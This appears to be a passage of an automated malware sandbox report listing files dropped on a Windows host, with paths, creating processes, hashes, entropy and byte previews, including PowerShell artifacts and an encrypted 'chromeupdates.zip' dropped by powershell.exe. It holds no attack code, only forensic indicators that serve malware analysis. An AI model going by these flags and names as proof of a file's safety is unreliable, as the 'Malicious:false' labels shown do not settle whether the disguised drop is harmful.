                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................{.........i.............................................................Rich....................PE..L...>|.a.........."!.........................................................@......{.....@A......................................... ...................#...0.......#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11608
                                                                                                                                                                                                  Entropy (8bit):4.890472898059848
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                                                                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                                                                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                                                                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                                                                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1524
                                                                                                                                                                                                  Entropy (8bit):5.3897992647355615
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:3eNn4SKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNmwr8HJYBlD3RYIq:ONn4SU4y4RQmFoUeCamfm9qr9tK8NfmL
                                                                                                                                                                                                  MD5:52DDF9254E55F5C78E5E3694FA056076
                                                                                                                                                                                                  SHA1:E45589300AAA7EB7C8742AA54D2B89B2066832F2
                                                                                                                                                                                                  SHA-256:E90B32707A0EE7A088A3D2EC780AE3BFBB91B2BB8DA0F9983745F2D97808D27E
                                                                                                                                                                                                  SHA-512:195DFA6572C0725E0E269C7ED56004F61E74916FCD83BEFBEF6A9280084861E264CA79F151CABDF38ADCCF81009CEE2902A439A73C4D05DDF82EF25802021757
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:@...e...........8.....................X..............@..........H...............x..}...@..."~.u....... .System.IO.Compression.FileSystemH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Ut

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MSIe2d60.LOG

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):246
                                                                                                                                                                                                  Entropy (8bit):3.513199765407527
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8+dt3:Qw946cPbiOxDlbYnuRK/3
                                                                                                                                                                                                  MD5:4698DADC4C390DF563B19668E4B1FC1A
                                                                                                                                                                                                  SHA1:ABEBD4131EEE16699A49E063257DBFC463786D71
                                                                                                                                                                                                  SHA-256:A3B4ACD3C347A698DDA8114A6AAD1E81D933B3600138C63FD54EC7406BC45814
                                                                                                                                                                                                  SHA-512:C5D7F947FCFB5DFAC088637BF4FD803E77DB7DBF70F070DC0BA859F130107DDA052BC6C8634D66BB91FA51BF5408C4EA06B85E1D4DEFE82EB14E0F29EFC0A09A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.5./.1.1./.2.0.2.4. . .0.3.:.0.0.:.4.4. .=.=.=.....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RES949A.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Nov 15 09:38:51 2024, 1st section name ".debug$S"
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1332
                                                                                                                                                                                                  Entropy (8bit):3.99553294021332
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HoCFzW916JgHSwKqxmNII+ycuZhNxNyakSANTPNnqS2d:ZyJKqxmu1ulx8a3AjqSG
                                                                                                                                                                                                  MD5:22998FE7E619283A49A5121D7275AD4E
                                                                                                                                                                                                  SHA1:8AEA4E7B966D9AE51DC9E68D486A9280A946B362
                                                                                                                                                                                                  SHA-256:60424C82E2ADDA5856A9B2B4D6B849A20A5A96A42A1DFF45AFB0166F9C166FDE
                                                                                                                                                                                                  SHA-512:524046F462238C7BBC53CCEDC5E9728428CDEF1CF1537B16A6C791D5DE5613E951EBF6F9CD6A0C85714B5AB1539051FC3AE4C115BA0856DB2777472CE6F098F2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:L.....7g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\o3u40tef\CSCF365B556FF7845F2AC7AB259D83AC6F.TMP.....................F..|CB~...........5.......C:\Users\user\AppData\Local\Temp\RES949A.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.3.u.4.0.t.e.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojwny3se.sxi.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxvweuob.vrf.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-15 03-00-38-733.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (393)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16525
                                                                                                                                                                                                  Entropy (8bit):5.376360055978702
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                                                                                                                                  MD5:1336667A75083BF81E2632FABAA88B67
                                                                                                                                                                                                  SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                                                                                                                                  SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                                                                                                                                  SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15114
                                                                                                                                                                                                  Entropy (8bit):5.357576780210804
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4OYWOwyOwROwCOwCOwNOwsbOwROwMGOwZOwUOwWOwUOwjOghOgaOBrOBBO2rO2B7:42KJKKl0b5EGhcesLFOQUFL9hQznOCoX
                                                                                                                                                                                                  MD5:D4DF6535FAF718B39877AFD5EB3BCFC5
                                                                                                                                                                                                  SHA1:1676F032F65557D40BB52B6F41C42B9C23DFF73A
                                                                                                                                                                                                  SHA-256:815C9C22E131250A9C173520C1410E427BF036B9226B41656BB748B51E5FF46A
                                                                                                                                                                                                  SHA-512:DE4ABC1E0ED1259EF44F981D9C0CD8707657D3172771BF7CEDFDCC37EA86B2B7885B8D39ACA1849B66C0CAD5968CDB38CDD55980ADCFE244C0CE3DFD583C654D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:SessionID=41edb9a8-0fb7-4b88-8834-0b8ec7d7c790.1731657638751 Timestamp=2024-11-15T03:00:38:751-0500 ThreadID=7716 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=41edb9a8-0fb7-4b88-8834-0b8ec7d7c790.1731657638751 Timestamp=2024-11-15T03:00:38:759-0500 ThreadID=7716 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=41edb9a8-0fb7-4b88-8834-0b8ec7d7c790.1731657638751 Timestamp=2024-11-15T03:00:38:759-0500 ThreadID=7716 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=41edb9a8-0fb7-4b88-8834-0b8ec7d7c790.1731657638751 Timestamp=2024-11-15T03:00:38:759-0500 ThreadID=7716 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=41edb9a8-0fb7-4b88-8834-0b8ec7d7c790.1731657638751 Timestamp=2024-11-15T03:00:38:759-0500 ThreadID=7716 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29752
                                                                                                                                                                                                  Entropy (8bit):5.397064875623838
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbP:7
                                                                                                                                                                                                  MD5:0B7F6093258E1BDEAE5AC707C231219A
                                                                                                                                                                                                  SHA1:22390D5892A5241D1180ACD54A37E59772C8780D
                                                                                                                                                                                                  SHA-256:40EAF13764EBA0FAA91F9DC5294D946694063DF2284388B1051EFF47D5BF6D61
                                                                                                                                                                                                  SHA-512:DD0519C2B669A8FB8A8ED79BF9197C5F9F3B96D99060A07AF7B9AEC19EA17D1585FBE823E1DC78B132772FCB895D12E9F19790DDB7C7762B448DED00B6230B5A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\3f252c88-b8b0-4400-8a32-8f2633fc133e.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1407294
                                                                                                                                                                                                  Entropy (8bit):7.97605879016224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                                                                                                                                                                                  MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                                                                                                                                                                                  SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                                                                                                                                                                                  SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                                                                                                                                                                                  SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\779d734b-8e1c-4670-b07e-70e36ed4d2ec.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):386528
                                                                                                                                                                                                  Entropy (8bit):7.9736851559892425
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                                                                                  MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                                                                  SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                                                                  SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                                                                  SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\8d4e022c-a03f-4b74-89ea-6a63c06efbb1.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1419751
                                                                                                                                                                                                  Entropy (8bit):7.976496077007677
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:/xA7ouWLaGZ7wYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVuWLaGZ7wZGk3mlind9i4ufFXpAXkru
                                                                                                                                                                                                  MD5:13F55292D0735B9ABD4259B225D210FC
                                                                                                                                                                                                  SHA1:810CC5D545BFA11D2825F6E1DFA69176794DA7EC
                                                                                                                                                                                                  SHA-256:8C3FFEA68963D108599E8C5AE20DE6E9C473BF33197A03A9A7DDCD0F25A6C7F6
                                                                                                                                                                                                  SHA-512:4F54EDA9EB61172A5243DAA718CFF42A0BF079CC0FA7BE3553CC8B79772763B49F530DD6B54A9D595C4F46B8416ADF7D5C8DAD58FC43A5C651258E669DC375DA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\de4eb4aa-eabc-424b-855e-e324974c5f84.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):758601
                                                                                                                                                                                                  Entropy (8bit):7.98639316555857
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                                                                                                                  MD5:3A49135134665364308390AC398006F1
                                                                                                                                                                                                  SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                                                                                                                  SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                                                                                                                  SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\chromeupdates.zip

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17730909
                                                                                                                                                                                                  Entropy (8bit):7.996828031778434
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:393216:Oo5GuBC0vp7RHQS/J8h5+x+mR2Dri/wa+1/eTIz6diG/C:OoxBhB7RHQoJ8Cx+m8XLJX+dix
                                                                                                                                                                                                  MD5:9C645B1011A1CA4868B00708FB8530C6
                                                                                                                                                                                                  SHA1:BC48CC7F83B6588178796FA3922B6DED0AF8B1C2
                                                                                                                                                                                                  SHA-256:B9E43E501CA30487CF556B8BFE5EA644CD130D1F5CCE8F7FBEB4A68EEF976D99
